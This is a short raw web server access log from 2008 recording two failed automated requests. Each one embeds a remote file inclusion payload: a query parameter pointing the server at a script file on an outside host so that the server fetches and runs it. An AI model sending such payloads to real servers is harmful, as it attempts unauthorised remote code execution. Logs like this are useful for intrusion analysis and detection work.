62.210.139.66 - - [31/Aug/2008:10:14:24 -0700] "GET /logs/access_080702.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
89.108.64.208 - - [31/Aug/2008:10:14:36 -0700] "GET /logs/access_080806.log/atom.php5?page=http://jofchurch.org/calendar//tools//mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
